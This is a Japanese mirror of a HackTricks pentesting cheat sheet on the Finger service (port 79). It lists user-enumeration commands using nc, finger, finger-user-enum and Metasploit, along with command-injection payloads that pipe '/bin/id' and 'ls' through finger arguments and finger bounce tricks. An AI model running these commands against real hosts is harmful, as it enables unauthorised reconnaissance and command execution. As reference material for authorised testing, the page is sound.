mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
4.5 KiB
4.5 KiB
79 - Pentesting Finger
ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
HackTricks をサポートする他の方法:
- HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい 場合は SUBSCRIPTION PLANS をチェックしてください!
- 公式PEASS&HackTricksのグッズを入手する
- The PEASS Familyを発見し、独占的な NFTs のコレクションを見つける
- 💬 Discordグループ に参加するか、telegramグループ に参加するか、Twitter 🐦 @carlospolopm をフォローする
- ハッキングトリックを共有するために、PRを HackTricks と HackTricks Cloud のGitHubリポジトリに提出してください。
基本情報
Finger プログラム/サービスは、コンピュータユーザーに関する詳細を取得するために使用されます。通常、提供される情報には ユーザーのログイン名、フルネーム が含まれ、場合によっては追加の詳細もあります。これらの追加の詳細には、オフィスの場所や電話番号(利用可能な場合)、ユーザーがログインした時間、非アクティブな期間(アイドル時間)、ユーザーが最後にメールを読んだ時刻、ユーザーのプランとプロジェクトファイルの内容が含まれることがあります。
デフォルトポート: 79
PORT STATE SERVICE
79/tcp open finger
列挙
バナー取得/基本的な接続
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
ユーザー列挙
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
代わりに、pentestmonkeyからfinger-user-enumを使用することもできます。いくつかの例:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmapはデフォルトのスクリプトを使用するためにスクリプトを実行します
MetasploitはNmapよりも多くのトリックを使用します
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
コマンド実行
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
フィンガーバウンス
finger user@host@victim
finger @internal@external
htARTE(HackTricks AWS Red Team Expert) を使って、ゼロからヒーローまでAWSハッキングを学ぶ!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスウォッグを入手する
- The PEASS Familyを発見し、独占的なNFTsコレクションを見る
- 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmでフォローする。
- ハッキングトリックを共有するために、PRを HackTricksおよびHackTricks Cloud のGitHubリポジトリに提出してください。